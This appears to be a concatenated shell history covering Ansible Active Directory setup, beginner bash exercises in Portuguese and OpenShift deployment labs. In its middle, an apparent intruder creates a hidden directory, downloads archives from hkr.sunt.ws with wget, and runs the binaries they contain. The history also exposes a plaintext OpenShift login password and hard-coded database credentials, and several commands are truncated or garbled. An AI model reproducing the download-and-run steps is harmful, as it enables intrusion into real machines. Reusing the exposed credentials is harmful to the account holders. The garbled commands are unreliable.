+ansible-playbook ad.yml -e "GUID=2b3b" +ansible-playbook ad.yml -e +vim win_ad_install/tasks/print_domainlist.yml +ansible-playbook ad.yml -e "GUID=2b3b" +vim win_ad_install/tasks/ad_controller.yml +vim win_ad_install/vars/main.yml +ansible-playbook ad.yml +vim win_ad_install/tasks/main.yml +vim win_ad_install/tasks/reboot.yml +vim win_ad_install/tasks/ad_controller.yml +vim win_ad_install/tasks/print_domainlist.yml +ansible-playbook ad.yml +ansible-playbook ad.yml -vvvv +ls +python-devel +sudo yum install python-devel krb5-devel krb5-libs krb5-workstation python-pip gcc +sudo pip install pywinrm +pip install pywinrm[kerberos] +sudo pip install pywinrm[kerberos] +sudo export GUID=`hostname | awk -F"." '{print $2}'` +cat << EOF > /etc/krb5.conf.d/ansible.conf +[realms] + + AD1.${GUID_CAP}.EXAMPLE.OPENTLC.COM = { + + kdc = ad1.${GUID}.example.opentlc.com + } + +[domain_realm] + .ad1.${GUID}.example.opentlc.com = AD1.${GUID_CAP}.EXAMPLE.OPENTLC.COM +EOF + +sudo cat << EOF > /etc/krb5.conf.d/ansible.conf +[realms] + + AD1.${GUID_CAP}.EXAMPLE.OPENTLC.COM = { + + kdc = ad1.${GUID}.example.opentlc.com + } + +[domain_realm] + .ad1.${GUID}.example.opentlc.com = AD1.${GUID_CAP}.EXAMPLE.OPENTLC.COM +EOF + +sudo cat << EOF > /etc/krb5.conf.d/ansible.conf +[realms] + + AD1.${GUID_CAP}.EXAMPLE.OPENTLC.COM = { + + kdc = ad1.${GUID}.example.opentlc.com + } + +[domain_realm] + .ad1.${GUID}.example.opentlc.com = AD1.${GUID_CAP}.EXAMPLE.OPENTLC.COM +EOF + +sudo su +cat /etc/krb5.conf.d/ansible.conf + +kinit administrator@AD1.2b3b.EXAMPLE.OPENTLC.COM +kinit administrator@AD1.${GUID_CAP}.EXAMPLE.OPENTLC.COM +Password for administrator@AD1.${GUID_CAP}.EXAMPLE.OPENTLC.COM: +sudo su +vi +vi +vi LuanaMeurerVIM +cat LuanaMeurerVIM +vi TesteVIM +cat TesteVIM +mcedit +nano +cat teste nano +nano +cat teste nano +nano +cat teste nano +less teste nano +exit +sudo su +sudo +su +login +clear +echo $PATH +mkdir bin +vi primeiroscript +chmod +x primeiroscript +ls -la +ls -l +primeiroscript +vim primeiroscript +primeiroscript +vi primeiro script +vi primeiroscript +ls -l +ls -l +vi primeiroscript +primeiroscript +vi primeiroscript +primeiroscript +vi primeiroscript +primeiroscript +vi primeiroscript +primeiroscript +vi primeiroscript +primeiroscript +exit +ls +ls -la +ls +vim primeiro +n1=8 +n2=7 +echo "Informe usuario>"; read user; +test "$user" = "redes" && echo "User: $user" ||echo "User: errado" +luana@lo:~$ echo "Informe usuario>"; read user; +Informe usuario> +luah +luana@lo:~$ test "$user" = "redes" && echo "User: $user" ||echo "User: errado" +User: errado +clear +clear +vi script +./script +chmod u+x script +./script +vi scriptidade +chmod u+x scriptidade +./scriptidade +vi scriptidade +./scriptidade +vi scriptidade +./scripidade +./scriptidade +vi scriptidade +./scriptidade +vi scriptnome +chmod u+x scriptnome +./scriptnome +vi scriptnome +./scriptnome +vi script idade +vi scriptidade +./scriptidade +vi scriptbin +chmod u+x scriptbin +./scriptbin +vi scriptteste +chmod u+x scriptteste +./scripttes +./scriptteste +vi scriptteste +./scriptteste +vi scriptteste +./scriptteste +vi scriptteste +./scriptteste +vi scriptteste +./scriptteste +vi scriptteste +./scriptteste +num=7 +num2=9 +if test $num -lt $num2; then echo "Menor"; else echo "Maior"; fi +luana@local:~$ num=7 +luana@local:~$ num2=9 +luana@local:~$ if test $num -lt $num2 +> then echo "Menor" +> else +> echo "Maior" +> fi +Menor +luana@local:~$ num=7 +luana@local:~$ num2=9 +luana@local:~$ if test $num -lt $num2 +> then echo "Menor" +> else +> echo "Maior" +> fi +Menor +clear +num= +clear +num=10 +num2=6 +if test $num -lt $num2; then echo "Menor"; else echo "Maior"; fi +num=7 +num2=9 +then echo "Menor" +if test $num -lt $num2; then echo "Menor"; else echo "Maior"; fi +clear +if [5 -lt 8]; then echo "menor"; else echo "maior"; fi +vim script123.sh +chmod +x script123.sh +./script123.sh +vim script123.sh +./script123.sh +clear +vim script123.sh +./script123.sh +vim script123.sh +./script123.sh +clear +vim script123.sh +./script123.sh +vim script123.sh +rm script123.sh +ls +clear +./juntaTudo testando o comando +clear +juntaTudo testando o comando +clear +vim script123.sh +chmod +x script123.sh +./script123.sh +vim script123.sh +./script123.sh +vim script123.sh +./script123.sh 3 2 +vim script123.sh +fg +./script123.sh +./script123.sh 3 5 +./script123.sh 6 2 +./script123.sh 6 6 +clear +vim script1234.sh +chmod +x script1234.sh +./script1234.sh testando o comando no local +exit +nano +clear +exit +vi scriptrabalho +nano +nano scriptrabalho +ls +nano scriptrabalhoM-D +man cat +clear +man cat +nano scriptrabalhoM-D +nano scriptrabalho +exit +nano scriptrabalho +chmod +x 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+arquivotrabalho2 tr a-z A-Z +arquivotrabalho2 | tr a-z A-Z +chmod +x arquivotrabalho2 + +arquivotrabalho3 | tr a-z A-Z +chmod +x arquivotrabalho3 +arquivotrabalho3 | tr a-z A-Z +chmod +x arquivotrabalho4 +arquivotrabalho4 | tr a-z A-Z +vim scriptrabalho +./scriptrabalho +vim scriptrabalho +exit +vim scriptrabalho +rev arquivotrabalho2 +vim scriptrabalho +uniq -d arquivotrabalho2 +vim arquivotrabalho2 +vim arquivotrabalho4 +tr A-Z arquivotrabalho4 +vim arquivotrabalho4 +tr --help +tr -c arquivotrabalho4 [:upper:] +tr arquivotrabalho4 [:upper:] +tr [:lower:] arquivotrabalho4 [:upper:] +tr [:upper:] arquivotrabalho4 [:upper:] +tr --help +vim arquivotrabalho4 +cat arquivotrabalho4 | tr a-z A-Z +vim scriptrabalho +exit +vim scriptrabalho +cat arquivotrabalho4 | tr -d e +exit +scriptrabalho +vim scriptrabalho +cat -n arquivotrabalho +cat -n arquivotrabalho2 +cat -n arquivotrabalho3 + +vim scriptrabalho +wc - arquivotrabalho +wc -w arquivotrabalho +wc -w arquivotrabalho2 +wc -w arquivotrabalho3 +vim scriptrabalho +exit +vim scriptrabalho +./scriptrabalho +vim scriptrabalho +./scriptrabalho +vim scriptrabalho +grep -i | arquivotrabalho2 +grep -i | arquivotrabalho +vim arquivotrabalho +grep -i | arquivotrabalho +chmod +x arquivotrabalho +grep -i | arquivotrabalho +grep -i | etc +grep -i | /etc +grep -i | arquivo +grep -i | arquivotrabalho +grep -i | arquivotrabalho2 +grep -i 123 | arquivotrabalho +grep -i teste | arquivotrabalho +grep -i | arquivotrabalho +grep -i | arquivotrabalho3 +grep -i | arquivotrabalho4 +grep teste | arquivotrabalho4 +grep -i teste | arquivotrabalho +grep -i | arquivotrabalho +vim scriptrabalho +./scriptrabalho +vim scriptrabalho +grep --help +grep -w | arquivotrabalho2 +grep -w | arquivotrabalho3 +grep -w +rm arquivotrabalho +grep -i | arquivotrabalho +vim arquivotrabalho +grep -i | arquivotrabalho +./scriptrabalho +vim scriptrabalho +./scriptrabalho +vim scriptrabalho +grep -i | teste +grep -i | home +ls +vim [arquivotrabalho] +rm [arquivotrabalho] +grep -i | primeiro +grep -v | teste +grep -v teste | arquivotrabalho4 +grep -i [teste] | arquivotrabalho4 +cat arquivotrabalho4 | grep -i teste +vim scriptrabalho +./scriptrabalho +exit +ls +vim scriptrabalhordf +rm scriptrabalhordf +ls +ls +vim scriptrabalho +vim primeiroscript +vim scriptaula +vim scriptaula183 +vim scriptaula283 +vim scriptbin +vim scripidade +vim scriptidade +vim scriptnome +simnao.sh +clear +ls +vim scripteste +vim scriptteste +exit +ls +exit +ls +vim scriptrabalho +exit +ls +vim scriptnome +vim scriptteste +exit +s +w +wget +exit +wget +cat /proc/cpuinfo +w +ps -ax +passwd +uname -a +cat /proc/cpuinfo +ps -ax +ps x +mkdir .tm +exit +ls +mkdir .tmp +wget hkr.sunt.ws./ha.tgz +tar xvf ha.tgz +./linux +ps -ax +wget hkr.sunt.ws./hkr.tar +tar xvf hkr.tar +./hkr 72.2 +8 +ls +ls -l +ls -l +cp a.php b.php +ls -l +cat b.php +rm b.php +ls -l +ls -l +cls +clr +clear +mkdir a +ls -l +ls -l +ls -l +clear +ls -l +rmdir a +ls +touch c.php +ls +ls -l +chmod 777 +chmod 777 a.php +ls -l +.// +../ +.. +ls +ls +ls +ls +clear +a.zip +zip a.zip * +ls -l +unzip a.zip +dir +dir -l +mv a.php b.php +ls +mv b.php z.php +ls -l +nc +mc +mysql +mysql -ushop14 -p shop14 +ls +oc login -u user16 -p r3dh4t1!ster.bd2b.openshift.opentlc.com +ls + oc new-project blue-green --description="This is a lab for blue green deployment" --display-name="Blue Green" +oc new-app --name='blue' --labels=name="blue" phps +oc expose svc bluegreen +oc new-app --name='blue' --labels=name="blue" phpsoc new-app --name='blue' --labels=name="blue" phps +ec expose svc/blue-green --name=bluegreen-example +oc expose svc/blue-green --name=bluegreen-example +oc expose svc/blue --name=bluegreen-example +route "bluegreen-example" exposed +while true; do curl -s $(oc get route bluegreen --template='{{ .spec.host }}')/item.php | grep "data/images" | awk '{print $5}'; sleep 1; done +oc expose svc/blue --name=bluegreen +while true; do curl -s $(oc get route bluegreen --template='{{ .spec.host }}')/item.php | grep "data/images" | awk '{print $5}'; sleep 1; done +ls +oc login -u user16 -p r3dh4t1!ster.bd2b.openshift.opentlc.com +ls + oc new-project blue-green --description="This is a lab for blue green deployment" --display-name="Blue Green" +oc new-app --name='blue' --labels=name="blue" phps +oc expose svc bluegreen +oc new-app --name='blue' --labels=name="blue" phpsoc new-app --name='blue' --labels=name="blue" phps +ec expose svc/blue-green --name=bluegreen-example +oc expose svc/blue-green --name=bluegreen-example +oc expose svc/blue --name=bluegreen-example +route "bluegreen-example" exposed +while true; do curl -s $(oc get route bluegreen --template='{{ .spec.host }}')/item.php | grep "data/images" | awk '{print $5}'; sleep 1; done +oc expose svc/blue --name=bluegreen +while true; do curl -s $(oc get route bluegreen --template='{{ .spec.host }}')/item.php | grep "data/images" | awk '{print $5}'; sleep 1; done +oc new-app --name='green' --labels=name="green" phps +oc patch svc/green --name=bluegreen +oc patch route/bluegreen -p '{"spec":{"to":{"name":"blue"}}}' +oc patch route/bluegreen -p '{"spec":{"to":{"name":"green"}}}' +while true; do curl -s $(oc get route bluegreen --template='{{ .spec.host }}')/item.php | grep "data/cities" | awk '{print $5}'; sleep 1; done +ls +oc login -u user16 -p r3dh4t1!ster.bd2b.openshift.opentlc.com +ls + oc new-project blue-green --description="This is a lab for blue green deployment" --display-name="Blue Green" +oc new-app --name='blue' --labels=name="blue" phps +oc expose svc bluegreen +oc new-app --name='blue' --labels=name="blue" phpsoc new-app --name='blue' --labels=name="blue" phps +ec expose svc/blue-green --name=bluegreen-example +oc expose svc/blue-green --name=bluegreen-example +oc expose svc/blue --name=bluegreen-example +route "bluegreen-example" exposed +while true; do curl -s $(oc get route bluegreen --template='{{ .spec.host }}')/item.php | grep "data/images" | awk '{print $5}'; sleep 1; done +oc expose svc/blue --name=bluegreen +while true; do curl -s $(oc get route bluegreen --template='{{ .spec.host }}')/item.php | grep "data/images" | awk '{print $5}'; sleep 1; done +oc new-app --name='green' --labels=name="green" phps +oc patch svc/green --name=bluegreen +oc patch route/bluegreen -p '{"spec":{"to":{"name":"blue"}}}' +oc patch route/bluegreen -p '{"spec":{"to":{"name":"green"}}}' +while true; do curl -s $(oc get route bluegreen --template='{{ .spec.host }}')/item.php | grep "data/cities" | awk '{print $5}'; sleep 1; done +oc new-app --name='green' --labels=name="green" phps +oc patch svc/green --name=bluegreen +oc patch route/bluegreen -p '{"spec":{"to":{"name":"green"}}}' +while true; do curl -s $(oc get route bluegreen --template='{{ .spec.host }}')/item.php | grep "data/cities" | awk '{print $5}'; sleep 1; done +oc patch route/bluegreen -p '{"spec":{"to":{"name":"blue"}}}' +while true; do curl -s $(oc get route bluegreen --template='{{ .spec.host }}')/item.php | grep "data/cities" | awk '{print $5}'; sleep 1; done +while true; do curl -s $(oc get route bluegreen --template='{{ .spec.host }}')/item.php | grep "data/cats" | awk '{print $5}'; sleep 1; done +ls +oc login -u user16 -p r3dh4t1!ster.bd2b.openshift.opentlc.com +ls +while true; do curl -s $(oc get route bluegreen --template='{{ .spec.host }}')/item.php | grep "data/cats" | awk '{print $5}'; sleep 1; done +oc patch route/bluegreen -p '{"spec":{"to":{"name":"green"}}}' +while true; do curl -s $(oc get route green --template='{{ .spec.host }}')/item.php | grep "data/cities" | awk '{print $5}'; sleep 1; done +while true; do curl -s $(oc get route bluegreen --template='{{ .spec.host }}')/item.php | grep "data/cities" | awk '{print $5}'; sleep 1; done +ls +oc login -u user16 -p r3dh4t1!ster.bd2b.openshift.opentlc.com +ls + oc new-project blue-green --description="This is a lab for blue green deployment" --display-name="Blue Green" +oc new-app --name='blue' --labels=name="blue" phps +oc expose svc bluegreen +oc new-app --name='blue' --labels=name="blue" phpsoc new-app --name='blue' --labels=name="blue" phps +ec expose svc/blue-green --name=bluegreen-example +oc expose svc/blue-green --name=bluegreen-example +oc expose svc/blue --name=bluegreen-example +route "bluegreen-example" exposed +while true; do curl -s $(oc get route bluegreen --template='{{ .spec.host }}')/item.php | grep "data/images" | awk '{print $5}'; sleep 1; done +oc expose svc/blue --name=bluegreen +while true; do curl -s $(oc get route bluegreen --template='{{ .spec.host }}')/item.php | grep "data/images" | awk '{print $5}'; sleep 1; done +oc new-app --name='green' --labels=name="green" phps +oc patch svc/green --name=bluegreen +oc patch route/bluegreen -p '{"spec":{"to":{"name":"blue"}}}' +oc patch route/bluegreen -p '{"spec":{"to":{"name":"green"}}}' +while true; do curl -s $(oc get route bluegreen --template='{{ .spec.host }}')/item.php | grep "data/cities" | awk '{print $5}'; sleep 1; done +oc new-app --name='green' --labels=name="green" phps +oc patch svc/green --name=bluegreen +oc patch route/bluegreen -p '{"spec":{"to":{"name":"green"}}}' +while true; do curl -s $(oc get route bluegreen --template='{{ .spec.host }}')/item.php | grep "data/cities" | awk '{print $5}'; sleep 1; done +oc patch route/bluegreen -p '{"spec":{"to":{"name":"blue"}}}' +while true; do curl -s $(oc get route bluegreen --template='{{ .spec.host }}')/item.php | grep "data/cities" | awk '{print $5}'; sleep 1; done +while true; do curl -s $(oc get route bluegreen --template='{{ .spec.host }}')/item.php | grep "data/cats" | awk '{print $5}'; sleep 1; done +ls +oc login -u user16 -p r3dh4t1!ster.bd2b.openshift.opentlc.com +ls +while true; do curl -s $(oc get route bluegreen --template='{{ .spec.host }}')/item.php | grep "data/cats" | awk '{print $5}'; sleep 1; done +oc patch route/bluegreen -p '{"spec":{"to":{"name":"green"}}}' +while true; do curl -s $(oc get route green --template='{{ .spec.host }}')/item.php | grep "data/cities" | awk '{print $5}'; sleep 1; done +while true; do curl -s $(oc get route bluegreen --template='{{ .spec.host }}')/item.php | grep "data/cities" | awk '{print $5}'; sleep 1; done +oc get routes +while true; do curl -s $(oc get route bluegreen --template='{{ .spec.host }}')/item.php | grep "data" | awk '{print $5}'; sleep 1; done +while true; do curl -s $(oc get route bluegreen --template='{{ .spec.host }}')/item.php | grep "data/images/cities" | awk '{print $5}'; sleep 1; done +abifoluwa.oni-capgemini.com@bastion.954f.example.opentlc.com +while true; do curl -s $(oc get route bluegreen --template='{{ .spec.host }}')/item.php | grep "data/images" | awk '{print $5}'; sleep 1; done +while true; do curl -s $(oc get route bluegreen --template='{{ .spec.host }}')/item.php | grep "data/images" | awk '{print $5}'; sleep 1; done +while true; do curl -s $(oc get route bluegreen --template='{{ .spec.host }}')/item.php | grep "data/cities" | awk '{print $5}'; sleep 1; done +while true; do curl -s $(oc get route bluegreen --template='{{ .spec.host }}')/item.php | grep "data/cats" | awk '{print $5}'; sleep 1; done +ls +oc login -u user16 -p r3dh4t1!ster.bd2b.openshift.opentlc.com +ls + oc new-project blue-green --description="This is a lab for blue green deployment" --display-name="Blue Green" +oc new-app --name='blue' --labels=name="blue" phps +oc expose svc bluegreen +oc new-app --name='blue' --labels=name="blue" phpsoc new-app --name='blue' --labels=name="blue" phps +ec expose svc/blue-green --name=bluegreen-example +oc expose svc/blue-green --name=bluegreen-example +oc expose svc/blue --name=bluegreen-example +route "bluegreen-example" exposed +while true; do curl -s $(oc get route bluegreen --template='{{ .spec.host }}')/item.php | grep "data/images" | awk '{print $5}'; sleep 1; done +oc expose svc/blue --name=bluegreen +while true; do curl -s $(oc get route bluegreen --template='{{ .spec.host }}')/item.php | grep "data/images" | awk '{print $5}'; sleep 1; done +oc new-app --name='green' --labels=name="green" phps +oc patch svc/green --name=bluegreen +oc patch route/bluegreen -p '{"spec":{"to":{"name":"blue"}}}' +oc patch route/bluegreen -p '{"spec":{"to":{"name":"green"}}}' +while true; do curl -s $(oc get route bluegreen --template='{{ .spec.host }}')/item.php | grep "data/cities" | awk '{print $5}'; sleep 1; done +oc new-app --name='green' --labels=name="green" phps +oc patch svc/green --name=bluegreen +oc patch route/bluegreen -p '{"spec":{"to":{"name":"green"}}}' +while true; do curl -s $(oc get route bluegreen --template='{{ .spec.host }}')/item.php | grep "data/cities" | awk '{print $5}'; sleep 1; done +oc patch route/bluegreen -p '{"spec":{"to":{"name":"blue"}}}' +while true; do curl -s $(oc get route bluegreen --template='{{ .spec.host }}')/item.php | grep "data/cities" | awk '{print $5}'; sleep 1; done +while true; do curl -s $(oc get route bluegreen --template='{{ .spec.host }}')/item.php | grep "data/cats" | awk '{print $5}'; sleep 1; done +ls +oc login -u user16 -p r3dh4t1!ster.bd2b.openshift.opentlc.com +ls +while true; do curl -s $(oc get route bluegreen --template='{{ .spec.host }}')/item.php | grep "data/cats" | awk '{print $5}'; sleep 1; done +oc patch route/bluegreen -p '{"spec":{"to":{"name":"green"}}}' +while true; do curl -s $(oc get route green --template='{{ .spec.host }}')/item.php | grep "data/cities" | awk '{print $5}'; sleep 1; done +while true; do curl -s $(oc get route bluegreen --template='{{ .spec.host }}')/item.php | grep "data/cities" | awk '{print $5}'; sleep 1; done +oc get routes +while true; do curl -s $(oc get route bluegreen --template='{{ .spec.host }}')/item.php | grep "data" | awk '{print $5}'; sleep 1; done +while true; do curl -s $(oc get route bluegreen --template='{{ .spec.host }}')/item.php | grep "data/images/cities" | awk '{print $5}'; sleep 1; done +while true; do curl -s $(oc get route bluegreen --template='{{ .spec.host }}')/item.php ; sleep 1; done +while true; do curl -s $(oc get route bluegreen --template='{{ .spec.host }}')/item.php | grep "data/images/cities" ; sleep 1; done +oc update svc/blue --env=SELECTOR=pets +oc --help +oc env blue +oc env blue --all +oc env bluegreen --all +oc update svc/blue --env=SELECTOR=pets +oc env svc/blue --overwrite STORAGE=/opt +oc env dc/registry --overwrite STORAGE=/opt +oc env dc/blue --overwrite STORAGE=/opt +oc env dc/blue --overwrite SELECTOR=/pets +-c +exit +oc login -u user16 -p r3dh4t1!ster.bd2b.openshift.opentlc.com +oc set route-backends bluegreen green=100 blue=0 +oc set route-backends bluegreen green=0 blue=100 +oc set probe dc/green --readiness --get-urlseconds=2 +oc set probe dc/green --liveness --get-urlseconds=2 + oc new-project abi-login --description="This is a lab for blue green deployment" --display-name="ABI Logging" +FROM docker.io/centos:7 +COPY ./root / +ls +oc new-app docker.io/wkulhanek/logtofile:latest +oc status +oc edit dc logtofile +/bin/sh +docker +oc edit dc logtofile +oc logs -f logtofile +oc new-app --docker-image=docker.io/wkulhanek/logtofile:latest +oc edit dc logtofile +oc login -u user16 -p r3dh4t1!ster.bd2b.openshift.opentlc.com +oc set probe dc/blue --readiness --get-urlseconds=2 +oc set probe dc/blue --liveness --get-urlseconds=2 +oc set probe dc/blue --readiness --get-urlss.php --initial-delay-seconds=2 +oc set probe dc/blue --liveness --get-urlss.php --initial-delay-seconds=2 +oc set probe dc/blue --liveness --get-urlseconds=2 +oc set probe dc/blue --readiness --get-urlseconds=2 +oc set probe dc/blue --liveness --get-urlseconds=2 +oc login -u user16 -p r3dh4t1!ster.bd2b.openshift.opentlc.com +oc edit dc logtofile +oc new-project abi-project oc new-project abi-project \ +oc new-project abi-rocket --display-name ABI Rocket Chat +oc new-project abi-rocket --display-name "ABI Rocket Chat" + +oc create -f rockets.yaml +oc create -f mongodb-internal +oc get template +echo 'kind: Service +apiVersion: v1 +metadata: + name: "mongodb-internal" + labels: + name: "mongodb" + annotations: + service.alpha.kubernetes.io/tolerate-unready-endpoints: "true" +spec: + clusterIP: None + ports: + - name: mongodb + port: 27017 + selector: + name: "mongodb"' | oc create -f - +echo 'kind: Service +apiVersion: v1 +metadata: + name: "mongodb" + labels: + name: "mongodb" +spec: + ports: + - name: mongodb + port: 27017 + selector: + name: "mongodb"' | oc create -f - +echo 'kind: StatefulSet +apiVersion: apps/v1 +metadata: + name: "mongodb" +spec: + serviceName: "mongodb-internal" + replicas: 3 + selector: + matchLabels: + name: mongodb + template: + metadata: + labels: + name: "mongodb" + spec: + containers: + - name: mongo-container + image: "registry.access.redhat.com/rhscl/mongodb-34-rhel7:latest" + ports: + - containerPort: 27017 + args: + - "run-mongod-replication" + volumeMounts: + - name: mongo-data + mountPath: "/var/lib/mongodb/data" + env: + - name: MONGODB_DATABASE + value: "mongodb" + - name: MONGODB_USER + value: "mongodb_user" + - name: MONGODB_PASSWORD + value: "mongodb_password" + - name: MONGODB_ADMIN_PASSWORD + value: "mongodb_admin_password" + - name: MONGODB_REPLICA_NAME + value: "rs0" + - name: MONGODB_KEYFILE_VALUE + value: "12345678901234567890" + - name: MONGODB_SERVICE_NAME + value: "mongodb-internal" + readinessProbe: + exec: + command: + - stat + - /tmp/initialized + volumeClaimTemplates: + - metadata: + name: mongo-data + labels: + name: "mongodb" + spec: + accessModes: [ ReadWriteOnce ] + resources: + requests: + storage: "4Gi"' | oc create -f - +oc get pvc +oc scale statefulset mongodb --replicas=5 +oc scale statefulset mongodb --replicas=3 +oc scale statefulset mongodb-internal --replicas=3 +oc scale service mongodb-internal --replicas=3 +oc scale service mongodb-internal --replicas=5 +oc scale service mongodb --replicas=5 +oc new-app docker.io/rocketchat/rocket.chat:0.63.3 -e MONGO_URL="mongodb://mongodb_user:mongodb_password@mongodb:27017/mongodb?replicaSet=rs0" +oc expose svc/rocketchat +mongo -u $MONGODB_USER -p $MONGODB_PASSWORD $MONGODB_DATABASE +oc new-project abi-nexus display-name="Shared Nexus" +oc new-project abi-nexus --display-name="Shared Nexus" +oc new-app sonatype/nexus3:latest +oc expose svc/nexus3 +oc rollout pause dc nexus3 +oc patch dc nexus3 --patch='{ "spec": { "strategy": { "type": "Recreate" }}}' +oc set resources dc nexus3 --limits=memory=2Gi,cpu=2 --requests=memory=1Gi,cpu=500m +echo "apiVersion: v1 +kind: PersistentVolumeClaim +metadata: + name: nexus-pvc +spec: + accessModes: + - ReadWriteOnce + resources: + requests: + storage: 4Gi" | oc create -f - +oc set volume dc/nexus3 --add --overwrite --name=nexus3-volume-1 --mount-path=/nexus-data/ --type persistentVolumeClaim --claim-name=nexus-pvc +oc set probe dc/nexus3 --liveness --failure-threshold 3 --initial-delay-seconds 60 -- echo ok +oc set probe dc/nexus3 --readiness --failure-threshold 3 --initial-delay-seconds 60 --get-url +oc rollout resume dc nexus3 +oc set probe dc/nexus3 --liveness --failure-threshold 3 --initial-delay-seconds 60 -- echo ok +oc set probe dc/nexus3 --readiness --failure-threshold 3 --initial-delay-seconds 60 --get-url +curl -o setup_nexus3.sh -ssercontent.com/wkulhanek/ocp_advanced_development_resources/master/nexus/setup_nexus3.sh +chmod +x setup_nexus3.sh +./setup_nexus3.sh admin admin123s3 --template='{{ .spec.host }}') +rm setup_nexus3.sh +oc expose dc nexus3 --port=5000 --name=nexus-registry +oc create route edge nexus-registry --service=nexus-registry --port=5000 +oc get routes -n abi-nexus +oc login -u user16 -p r3dh4t1!ster.bd2b.openshift.opentlc.com +abifoluwa.oni-capgemini.com@bastion.954f.example.opentlc.com +oc annotate route nexus3 console.alpha.openshift.io/overview-app-route=true +oc annotate route nexus-registry console.alpha.openshift.io/overview-app-route=false +oc new-project abi-sonarqube --display-name "Shared Sonarqube" +oc new-app --template=postgresql-persistent --param POSTGRESQL_USER=sonar --param POSTGRESQL_PASSWORD=sonar --param POSTGRESQL_DATABASE=sonar --param VOLUME_CAPACITY=4Gi --labels=app=sonarqube_db +oc new-app --docker-image=wkulhanek/sonarqube:6.7.5 --env=SONARQUBE_JDBC_USERNAME=sonar --env=SONARQUBE_JDBC_PASSWORD=sonar --env=SONARQUBE_JDBC_URL=jdbc:postgresql://postgresql/sonar --labels=app=sonarqube +oc rollout pause dc sonarqube +oc expose service sonarqube +echo "apiVersion: v1 +kind: PersistentVolumeClaim +metadata: + name: sonarqube-pvc +spec: + accessModes: + - ReadWriteOnce + resources: + requests: + storage: 4Gi" | oc create -f - +oc set volume dc/sonarqube --add --overwrite --name=sonarqube-volume-1 --mount-path=/opt/sonarqube/data/ --type persistentVolumeClaim --claim-name=sonarqube-pvc +oc set probe dc/sonarqube --liveness --failure-threshold 3 --initial-delay-seconds 40 -- echo ok +oc set probe dc/sonarqube --readiness --failure-threshold 3 --initial-delay-seconds 20 --get-url +oc rollout resume dc sonarqube +oc new-project abi-sonarqube --display-name "Shared Sonarqube" +oc new-app --template=postgresql-persistent --param POSTGRESQL_USER=sonar --param POSTGRESQL_PASSWORD=sonar --param POSTGRESQL_DATABASE=sonar --param VOLUME_CAPACITY=4Gi --labels=app=sonarqube_db +oc new-app --docker-image=wkulhanek/sonarqube:6.7.5 --env=SONARQUBE_JDBC_USERNAME=sonar --env=SONARQUBE_JDBC_PASSWORD=sonar --env=SONARQUBE_JDBC_URL=jdbc:postgresql://postgresql/sonar --labels=app=sonarqube +oc rollout pause dc sonarqube +oc expose service sonarqube +echo "apiVersion: v1 +kind: PersistentVolumeClaim +metadata: + name: sonarqube-pvc +spec: + accessModes: + - ReadWriteOnce + resources: + requests: + storage: 4Gi" | oc create -f - +oc set volume dc/sonarqube --add --overwrite --name=sonarqube-volume-1 --mount-path=/opt/sonarqube/data/ --type persistentVolumeClaim --claim-name=sonarqube-pvc +oc set resources dc/sonarqube --limits=memory=3Gi,cpu=2 --requests=memory=2Gi,cpu=1 +oc patch dc sonarqube --patch='{ "spec": { "strategy": { "type": "Recreate" }}}' +oc set probe dc/sonarqube --liveness --failure-threshold 3 --initial-delay-seconds 40 -- echo ok +oc set probe dc/sonarqube --readiness --failure-threshold 3 --initial-delay-seconds 20 --get-url +oc rollout resume dc sonarqube +oc new-project abi-gogs --display-name "Shared Gogs" +oc new-app postgresql-persistent --param POSTGRESQL_DATABASE=gogs --param POSTGRESQL_USER=gogs --param POSTGRESQL_PASSWORD=gogs --param VOLUME_CAPACITY=4Gi -lapp=postgresql_gogs +oc new-app wkulhanek/gogs:11.34 -lapp=gogs +echo "apiVersion: v1 +kind: PersistentVolumeClaim +metadata: + name: gogs-data +spec: + accessModes: + - ReadWriteOnce + resources: + requests: + storage: 4Gi" | oc create -f - +oc set volume dc/gogs --add --overwrite --name=gogs-volume-1 --mount-path=/data/ --type persistentVolumeClaim --claim-name=gogs-data +oc expose svc gogs +oc get route gogs +oc exec $(oc get pod | grep "^gogs" | awk '{print $1}') -- cat /opt/gogs/custom/conf/app.ini >$HOME/app.ini +git cloneshift-tasks.git +git remote add gogss_user>:@$(oc get route gogs -n xyz-gogs --template='{{ .spec.host }}')/CICDLabs/openshift-tasks.git +git remote add gogss -n xyz-gogs --template='{{ .spec.host }}')/CICDLabs/openshift-tasks.git +git remote add gogss -n abi-gogs --template='{{ .spec.host }}')/CICDLabs/openshift-tasks.git +git push -u gogs master +git remote add gogss -n abi-gogs --template='{{ .spec.host }}')/CICDLabs/openshift-tasks.git +ls +git remote add gogss -n abi-gogs --template='{{ .spec.host }}')/CICDLabs/openshift-tasks.git +git push -u gogs master +oc get routes +git remote add gogss-abi-gogs.apps.bd2b.openshift.opentlc.com/CICDLabs/openshift-tasks.git +git remote gogss-abi-gogs.apps.bd2b.openshift.opentlc.com/CICDLabs/openshift-tasks.git +git remote delete gogs +git remote remove gogs +git remote add gogss-abi-gogs.apps.bd2b.openshift.opentlc.com/CICDLabs/openshift-tasks.git +git remote add gogss-abi-gogs.apps.bd2b.openshift.opentlc.com/CICDLabs/openshift-tasks.git +git remote -v +git push -u gogs master +ls +vi nexus_settings.xml +git commit -m "Updated Settings" nexus_settings.xml +git push gogs master +oc new-project abi-jenkins --display-name "Shared Jenkins" +oc new-app jenkins-persistent --param ENABLE_OAUTH=true --param MEMORY_LIMIT=2Gi --param VOLUME_CAPACITY=4Gi --param DISABLE_ADMINISTRATIVE_MONITORS=true +oc new-build -D $'FROM docker.io/openshift/jenkins-agent-maven-35-centos7:v3.11 + + USER root +RUN yum -y install skopeo && yum clean all + + USER 1001' --name=jenkins-agent-appdev -n abi-jenkins +oc get is +ls +ls +vi nexus_settings.xml +oc get routes +vi nexus_settings.xml +mvn clean install -DskipTests=true -s ./nexus_settings.xml +mvn test -s ./nexus_settings.xml +mvn -s ./nexus_settings.xml deploy -DskipTests=true -DaltDeploymentRepository=nexus::default:s3 -n abi-nexus --template='{{ .spec.host }}')/repository/releases +mvn sonar:sonar -s ./nexus_settings.xml -Dsonar.host.urlsonarqube -n abi-sonarqube --template='{{ .spec.host }}') +mvn sonar:sonar -s ./nexus_settings.xml -Dsonar.host.urlsonarqube -n abi-sonarqube --template='{{ .spec.host }}') +ls +ls +nano nexus_settings.xml +LS +ls +ls +oc get is +oc new-build -D $'FROM docker.io/openshift/jenkins-agent-maven-35-centos7:v3.11 + + USER root +RUN yum -y install skopeo && yum clean all + + USER 1001' --name=jenkins-agent-appdev -n abi-jenkins +oc get is +curl +oc new-build --binary=true --name=ola-binary --image-stream=redhat-openjdk18-openshift:1.2 